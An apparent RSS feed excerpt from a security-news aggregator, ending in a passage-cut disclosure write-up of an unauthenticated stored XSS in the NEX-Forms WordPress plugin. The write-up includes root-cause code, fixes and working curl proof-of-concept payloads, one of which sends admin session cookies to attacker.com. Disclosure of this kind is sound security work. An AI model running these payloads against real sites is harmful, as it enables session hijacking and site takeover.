<guid isPermaLink="true">https://tsecurity.de/de/3649760/it-security-nachrichten/inside-elastic-infosecs-agentic-soc-choosing-the-right-agent-architecture-for-a-5x-cost-reduction/</guid>
<pubDate>Mon, 06 Jul 2026 21:53:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We ran two agentic SOC architectures head to head across 36,822 real Agent Builder conversations. One won by 5.7x: a specialized workflow triaging alerts for $0.69 each, against $3.42 for a single agent juggling 14 Skills. The data and the decision framework are both below.]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.385.0]]></title>
<description><![CDATA[What's Changed

Support package-scoped NuGet release notes by @Cjewett in #15211
Filter null entries from job directories by @brettfo in #15457
devcontainers: preserve major-only Feature pins when precision-matching tags are absent by @thavaahariharangit with @Copilot in #15445
Type opaque hashes...]]></description>
<link>https://tsecurity.de/de/3649634/it-security-tools/v03850/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649634/it-security-tools/v03850/</guid>
<pubDate>Mon, 06 Jul 2026 20:52:04 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Support package-scoped NuGet release notes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Cjewett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Cjewett">@Cjewett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4578908271" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15211" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15211/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15211">#15211</a></li>
<li>Filter null entries from job directories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4778918666" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15457" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15457/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15457">#15457</a></li>
<li>devcontainers: preserve major-only Feature pins when precision-matching tags are absent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768499693" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15445" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15445/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15445">#15445</a></li>
<li>Type opaque hashes in common with T.anything by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4780604077" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15458" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15458/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15458">#15458</a></li>
<li>Type the options passthrough in base classes with T.anything by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4780986333" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15459" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15459/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15459">#15459</a></li>
<li>Apply git-tag cooldown across ecosystems by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4717708913" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15369" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15369/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15369">#15369</a></li>
<li>Type requirement helpers in the update-checker base class by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4782418992" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15461" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15461/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15461">#15461</a></li>
<li>Select group update handler for multi-ecosystem NuGet jobs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4781176807" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15460" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15460/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15460">#15460</a></li>
<li>Type error-detail payloads across common and the updater by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4782502056" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15462" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15462/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15462">#15462</a></li>
<li>Type package release details with T.anything by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4782630091" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15463" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15463/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15463">#15463</a></li>
<li>Type message builder commit options and vulnerabilities-fixed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4782757371" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15465" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15465/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15465">#15465</a></li>
<li>Fix multiple --default-index args when multiple replaces-base credentials exist by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4793511964" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15481" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15481/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15481">#15481</a></li>
<li>Fetch <code>gradle.properties</code> and making available lock file generation with in dependabot by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4784572088" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15467" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15467/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15467">#15467</a></li>
<li>Detect cargo registries across hierarchical .cargo/config.toml files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4787748929" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15474" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15474/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15474">#15474</a></li>
<li>fix(bundler): only re-vendor platform gems for updated dependencies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jurre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jurre">@jurre</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4775961359" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15451" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15451/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15451">#15451</a></li>
<li>Fix Sorbet runtime signature violations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4789853302" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15476" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15476/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15476">#15476</a></li>
<li>Use shared git-tag cooldown in python by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4786661051" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15470" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15470/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15470">#15470</a></li>
<li>Fix multiline HTML version parsing for Python/UV private registries by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785195003" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15469" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15469/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15469">#15469</a></li>
<li>v0.385.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4815391266" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15502" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15502/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15502">#15502</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Cjewett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Cjewett">@Cjewett</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4578908271" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15211" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15211/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15211">#15211</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.384.0...v0.385.0"><tt>v0.384.0...v0.385.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[QuimaRAT als MaaS: Java-RAT für Windows, Linux und macOS]]></title>
<description><![CDATA[LONDON / LONDON (IT BOLTWISE) – Sicherheitsforscher warnen vor QuimaRAT, einem plattformübergreifenden Remote-Access-Trojaner mit Java-Kern und MaaS-Angebot. Der Anbieter koppelt das Geschäftsmodell mit modularen Plugins, die sich aus einer Command-and-Control-Infrastruktur nachladen lassen. Für ...]]></description>
<link>https://tsecurity.de/de/3649093/it-security-nachrichten/quimarat-als-maas-java-rat-fuer-windows-linux-und-macos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649093/it-security-nachrichten/quimarat-als-maas-java-rat-fuer-windows-linux-und-macos/</guid>
<pubDate>Mon, 06 Jul 2026 16:36:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-quimarats-maaS-java-rat-loader-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON / LONDON (IT BOLTWISE) – Sicherheitsforscher warnen vor QuimaRAT, einem plattformübergreifenden Remote-Access-Trojaner mit Java-Kern und MaaS-Angebot. Der Anbieter koppelt das Geschäftsmodell mit modularen Plugins, die sich aus einer Command-and-Control-Infrastruktur nachladen lassen. Für die Betreiber interessant: Ein Builder erzeugt Clients in vielen Formaten und ein Web-Loader-Mechanismus nutzt Browser-Cache-Logik, um eine spätere Ausführung anzustoßen. Für Unternehmen […]</p>
<div><a href="https://www.it-boltwise.de/quimarat-als-maas-java-rat-fuer-windows-linux-und-macos.html">... den vollständigen Artikel <strong>»QuimaRAT als MaaS: Java-RAT für Windows, Linux und macOS«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/quimarat-als-maas-java-rat-fuer-windows-linux-und-macos.html">QuimaRAT als MaaS: Java-RAT für Windows, Linux und macOS</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-54673 | electron-userland electron-builder/builder-util-runtime up to 26.14.x Personal Access Token information disclosure (GHSA-p2f4-r6v6-j797 / Nessus ID 325147)]]></title>
<description><![CDATA[A vulnerability was found in electron-userland electron-builder and builder-util-runtime up to 26.14.x. It has been rated as problematic. This issue affects some unknown processing of the component Personal Access Token Handler. This manipulation causes information disclosure.

This vulnerability...]]></description>
<link>https://tsecurity.de/de/3649024/sicherheitsluecken/cve-2026-54673-electron-userland-electron-builderbuilder-util-runtime-up-to-2614x-personal-access-token-information-disclosure-ghsa-p2f4-r6v6-j797-nessus-id-325147/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649024/sicherheitsluecken/cve-2026-54673-electron-userland-electron-builderbuilder-util-runtime-up-to-2614x-personal-access-token-information-disclosure-ghsa-p2f4-r6v6-j797-nessus-id-325147/</guid>
<pubDate>Mon, 06 Jul 2026 16:10:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/electron-userland:electron-builder">electron-userland electron-builder and builder-util-runtime up to 26.14.x</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. This issue affects some unknown processing of the component <em>Personal Access Token Handler</em>. This manipulation causes information disclosure.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-54673">CVE-2026-54673</a>. Remote exploitation of the attack is possible. No exploit is available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[Unauthenticated Stored XSS in NEX-Forms Express WP Form Builder (≤ 9.1.10) — CVSS 8.8 High]]></title>
<description><![CDATA[TL;DR: Any anonymous visitor can POST a JavaScript payload to NEX-Forms’ form submission endpoint. The plugin stores it unsanitized in the database. When any admin opens the Entries panel, the payload executes — silently, automatically, every time. Complete site takeover from a single curl comman...]]></description>
<link>https://tsecurity.de/de/3643710/hacking/unauthenticated-stored-xss-in-nex-forms-express-wp-form-builder-9110-cvss-88-high/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643710/hacking/unauthenticated-stored-xss-in-nex-forms-express-wp-form-builder-9110-cvss-88-high/</guid>
<pubDate>Fri, 03 Jul 2026 15:37:08 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3><strong><em>TL;DR:</em></strong><em> Any anonymous visitor can POST a JavaScript payload to NEX-Forms’ form submission endpoint. The plugin stores it unsanitized in the database. When </em>any<em> admin opens the Entries panel, the payload executes — silently, automatically, every time. Complete site takeover from a single curl command.</em></h3><p><strong>Tags:</strong> #WordPresSecurity #InfoSec #SecurityResearch</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*B0I27yDTsfPdHb4smYnl5Q.png"></figure><h3>📋 Vulnerability Summary</h3><ul><li><strong>Plugin:</strong> NEX-Forms Express WP Form Builder</li><li><strong>Affected Version:</strong> ≤ 9.1.10 (latest as of 2026–03–22)</li><li><strong>Patched Version:</strong> Fixed</li><li><strong>Disclosure Status:</strong> Officially disclosed by WPScan, with vendor approval for disclosure agreement</li><li><strong>Vulnerability Type:</strong> Stored Cross-Site Scripting (XSS)</li><li><strong>CWE:</strong> CWE-79 — Improper Neutralization of Input During Web Page Generation</li><li><strong>CVSS 3.1 Score:</strong> <strong>8.8 HIGH</strong></li><li><strong>CVSS Vector:</strong> AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N</li><li><strong>Auth Required:</strong> ❌ None — fully unauthenticated</li><li><strong>Admin Interaction:</strong> ✅ Viewing the Entries page (routine workflow)</li><li><strong>Scope Change:</strong> ✅ Crosses from visitor context into privileged admin session</li></ul><h3>🔍 Introduction</h3><p>NEX-Forms Express WP Form Builder is a widely deployed WordPress form plugin. While reviewing its form submission pipeline, I found a stored Cross-Site Scripting vulnerability that requires <strong>zero authentication</strong> to exploit and results in full WordPress administrator compromise.</p><p>The vulnerability chains <strong>three distinct weaknesses</strong>:</p><ol><li>An open AJAX handler accessible without login</li><li>Missing HTML sanitization for array-type form fields</li><li>Unescaped output rendering in the WordPress admin panel</li></ol><p>Together, these allow a remote attacker to permanently plant malicious JavaScript that fires in every administrator’s browser — automatically, every time they view the form entries.</p><h3>⛓️ Root Cause: Three Weaknesses, One Chain</h3><h3>Weakness 1 — Open AJAX Handler (main.php:2656)</h3><p>WordPress has two AJAX hook prefixes: wp_ajax_ (logged-in users) and wp_ajax_nopriv_ (anonymous users). NEX-Forms registers both for its form submission handler:</p><pre>add_action( 'wp_ajax_submit_nex_form',        'submit_nex_form' );<br>add_action( 'wp_ajax_nopriv_submit_nex_form', 'submit_nex_form' );  // ← anonymous access</pre><p>Registering a nopriv handler is legitimate for a public contact form. The problem is what the handler does — there's no nonce verification, no CSRF check, and no rate limiting:</p><pre>function submit_nex_form($entry_action = false) {<br>    // ONLY check: honeypot field must be empty<br>    if ((sanitize_text_field($_POST['company_url']) != '') || strstr(..., '@qq.com'))<br>        die();<br>    // No: wp_verify_nonce(), check_ajax_referer(), current_user_can()<br>    // → proceeds directly to processing POST data</pre><p>Leave company_url empty and avoid a @qq.com address — you're in.</p><h3>Weakness 2 — Array Fields Skip Sanitization (main.php:2883)</h3><p>Inside the handler, form fields from $_POST are processed in a loop. Here's the critical divergence:</p><pre>if (is_array($val) || is_object($val)) {<br>    // ← CWE-79: rest_sanitize_array() does NO HTML stripping<br>    $data_array[] = [<br>        'field_name'  =&gt; $key,<br>        'field_value' =&gt; rest_sanitize_array($val),<br>    ];<br>} else {<br>    $val = strip_tags($val);              // ← scalar fields ARE stripped ✓<br>    $data_array[] = ['field_name' =&gt; $key,<br>        'field_value' =&gt; sanitize_text_field(str_replace('\\', '', $val))];<br>}</pre><blockquote><em>⚠️ </em><strong><em>The key fact:</em></strong><em> </em><em>rest_sanitize_array() is a WordPress REST API utility. Its entire implementation is </em><em>return array_values($data) — it reindexes the array and does </em><strong><em>nothing else</em></strong><em>. No HTML stripping. No entity encoding. Raw </em><em>&lt;script&gt;, </em><em>&lt;img onerror&gt;, and any other HTML passes straight through.</em></blockquote><p>The fix for scalar fields is right there in the else branch. The developer correctly applied strip_tags() to strings but chose the wrong function for array inputs.</p><h3>Weakness 3 — Raw Echo in Admin View (class.db.php:2624)</h3><p>When an admin opens an entry in the NEX-Forms dashboard, populate_form_entry() decodes the stored JSON and renders each field into an HTML table. For array-type values:</p><pre>foreach ($field_value as $val) {<br>    // ...<br>    $output .= rtrim($val, ', ') . '&lt;br /&gt;';  // ← no esc_html(), raw HTML output<br>}</pre><p>rtrim() strips trailing commas and spaces. That's it. The stored &lt;img src=x onerror=alert(document.domain)&gt; is written verbatim into $output, which is echoed directly into the admin page. WordPress's esc_html() — a one-character fix — was never applied.</p><h3>🔀 Attack Chain</h3><pre>Unauthenticated Attacker<br>        │<br>        │  1. HTTP POST — no credentials, no nonce, no CSRF token<br>        │     action=submit_nex_form<br>        │     nex_forms_Id=1<br>        │     company_url=              ← honeypot bypassed (empty)<br>        │     email=attacker@evil.com<br>        │     payload[]=&lt;img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)&gt;<br>        │<br>        ▼<br>    wp_ajax_nopriv_ handler fires<br>    submit_nex_form() passes honeypot check<br>    rest_sanitize_array() stores raw HTML → wp_wap_nex_forms_entries.form_data<br>        │<br>        │  2. Normal admin workflow: NEX-Forms → Entries<br>        │     (no special action required)<br>        │<br>        ▼<br>    populate_form_entry() decodes JSON<br>    rtrim($val) echoed without esc_html()<br>    &lt;img src=x onerror=...&gt; written directly into admin page DOM<br>        │<br>        ▼<br>    Browser renders admin page<br>    onerror fires automatically (no click required)<br>    Session cookie exfiltrated to attacker's server<br>        │<br>        ▼<br>    COMPLETE SITE TAKEOVER<br>    → Rogue admin account created<br>    → Backdoor plugin installed<br>    → Full database exfiltrated</pre><h3>🗄️ Database Evidence</h3><p>After submitting the PoC payload, a direct database check confirms the raw HTML is persisted:</p><pre>SELECT form_data FROM wp_wap_nex_forms_entries ORDER BY id DESC LIMIT 1;</pre><pre>[<br>  {"field_name": "email", "field_value": "attacker@evil.com"},<br>  {"field_name": "payload", "field_value": ["&lt;img src=x onerror=alert(document.domain)&gt;"]}<br>]</pre><p>The &lt;img&gt; tag is stored <strong>verbatim</strong> with no entity encoding. It persists until manually deleted — meaning every admin who views the Entries page will trigger the XSS, not just the first.</p><h3>🖥️ Admin Page Rendered Output</h3><p>Lab-confirmed AJAX response when admin loads the injected entry:</p><pre>&lt;td valign="top" style="vertical-align:top !important;"&gt;<br>  &lt;table width="100%" class="highlight" cellpadding="10" cellspacing="0"&gt;<br>    &lt;img src=x onerror=alert(document.domain)&gt;&lt;br /&gt;<br>  &lt;/table&gt;<br>&lt;/td&gt;</pre><p>The &lt;img&gt; tag lands directly in the DOM. The browser tries to load src="x", fails, and fires onerror — <strong>no click, no interaction required</strong>.</p><h3>💻 Proof of Concept</h3><blockquote><strong><em>Disclosure note:</em></strong><em> This PoC is provided for educational and authorized security testing only. Lab environment: WordPress 6.9.4, NEX-Forms 9.1.10, Bitnami Docker.</em></blockquote><h3>Step 1 — Inject payload (unauthenticated)</h3><pre>curl -s -X POST "http://TARGET/wp-admin/admin-ajax.php" \<br>  --data "action=submit_nex_form" \<br>  --data "nex_forms_Id=1" \<br>  --data "company_url=" \<br>  --data "email=attacker@evil.com" \<br>  --data "payload[]=&lt;img src=x onerror=alert(document.domain)&gt;"</pre><p>Expected response — valid entry ID confirms storage:</p><pre>&lt;input type="hidden" name="nf_entry_id" value="13"&gt;</pre><h3>Step 2 — Verify raw storage</h3><pre>wp db query "SELECT form_data FROM wp_wap_nex_forms_entries ORDER BY id DESC LIMIT 1;"<br># The &lt;img&gt; tag appears verbatim in field_value — no HTML encoding.</pre><h3>Step 3 — Trigger XSS as admin</h3><ol><li>Log in to WordPress admin: <a href="http://target/wp-admin/">http://TARGET/wp-admin/</a></li><li>Navigate to <strong>NEX-Forms → Form Entries</strong></li><li>Click the affected form → click the injected entry row</li><li>alert("localhost:8080") fires immediately — no interaction beyond page load</li></ol><h3>Step 4 — Real-world session hijack</h3><pre>curl -s -X POST "http://TARGET/wp-admin/admin-ajax.php" \<br>  --data "action=submit_nex_form" \<br>  --data "nex_forms_Id=1" \<br>  --data "company_url=" \<br>  --data "email=attacker@evil.com" \<br>  --data 'payload[]=&lt;img src=x onerror="var i=new Image();i.src='"'"'https://attacker.com/steal?c='"'"'+encodeURIComponent(document.cookie);"&gt;'</pre><p>When the administrator views entries, their session cookie is silently exfiltrated. From there, the attacker can create rogue admin accounts, install PHP webshell plugins, or dump the entire database.</p><h3>💥 Impact</h3><ul><li><strong>Admin views Entries (normal workflow):</strong> JavaScript executes in admin browser context</li><li><strong>Session cookie theft:</strong> Attacker hijacks admin session without credentials</li><li><strong>Rogue admin creation:</strong> fetch() silently POSTs to /wp-json/wp/v2/users</li><li><strong>Plugin upload via REST API:</strong> PHP webshell installed without further interaction</li><li><strong>Site defacement:</strong> document.body.innerHTML overwritten</li><li><strong>Persistent backdoor:</strong> Payload fires for every admin who views entries</li></ul><h3>🛠️ Remediation</h3><p>Two independent fixes are both necessary: sanitize at input, escape at output.</p><h3>Fix 1 — Sanitize array fields at storage (main.php:2883)</h3><p><strong>Vulnerable:</strong></p><pre>$data_array[] = [<br>    'field_name'  =&gt; $key,<br>    'field_value' =&gt; rest_sanitize_array($val),  // ← no HTML stripping<br>];</pre><p><strong>Fixed:</strong></p><pre>$sanitized = array_map('sanitize_text_field', (array) $val);<br>$data_array[] = [<br>    'field_name'  =&gt; $key,<br>    'field_value' =&gt; $sanitized,<br>];</pre><h3>Fix 2 — Escape output in admin view (class.db.php:2624)</h3><p><strong>Vulnerable:</strong></p><pre>$output .= rtrim($val, ', ') . '&lt;br /&gt;';</pre><p><strong>Fixed:</strong></p><pre>$output .= esc_html(rtrim($val, ', ')) . '&lt;br /&gt;';</pre><h3>Fix 3 — Nonce verification (defense-in-depth)</h3><pre>// Add at the top of submit_nex_form():<br>if (!isset($_POST['nf_nonce']) ||<br>    !wp_verify_nonce($_POST['nf_nonce'], 'nf_submit_' . $nex_forms_id)) {<br>    wp_send_json_error('Invalid request');<br>}</pre><blockquote><em>Fix 1 and Fix 2 each independently prevent the XSS. Fix 3 makes automated injection harder but is not a substitute for proper sanitization and escaping.</em></blockquote><h3>📊 CVSS 3.1 Breakdown</h3><ul><li><strong>Attack Vector (AV):</strong> Network (N) — Exploitable remotely over HTTP</li><li><strong>Attack Complexity (AC):</strong> Low (L) — Works on any default installation with a form</li><li><strong>Privileges Required (PR):</strong> None (N) — Fully unauthenticated</li><li><strong>User Interaction (UI):</strong> Required (R) — Admin views entries — their normal workflow</li><li><strong>Scope (S):</strong> Changed © — XSS crosses from visitor into privileged admin session</li><li><strong>Confidentiality ©:</strong> High (H) — Admin cookies, DB content, secret keys exposed</li><li><strong>Integrity (I):</strong> High (H) — Can create admins, install plugins, modify all content</li><li><strong>Availability (A):</strong> None (N) — No direct denial-of-service impact</li></ul><p><strong>Base Score: 8.8 HIGH</strong> — AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N</p><h3>📣 Disclosure Resources</h3><ul><li><strong>Plugin Author:</strong> <a href="https://basixonline.net/">https://basixonline.net/</a></li><li><strong>WordPress Plugin Support:</strong> <a href="https://wordpress.org/support/plugin/nex-forms-express-wp-form-builder/">https://wordpress.org/support/plugin/nex-forms-express-wp-form-builder/</a></li><li><strong>Wordfence Bug Bounty:</strong> <a href="https://www.wordfence.com/wordfence-intelligence-wordpress-vulnerability-database/">https://www.wordfence.com/wordfence-intelligence-wordpress-vulnerability-database/</a></li><li><strong>WPScan Vulnerability Database:</strong> <a href="https://wpscan.com/">https://wpscan.com/</a></li></ul><h3>🔑 Key Takeaways</h3><p><strong>For developers:</strong></p><ul><li>Always apply esc_html() (or esc_attr(), esc_url()) at every output point in WordPress — even in admin-only pages</li><li>Never assume admin-facing output is “safe” — XSS in admin context is just as dangerous as front-end XSS</li><li>rest_sanitize_array() is for REST API coercion, not for HTML sanitization — use array_map('sanitize_text_field', $arr) instead</li><li>Apply the 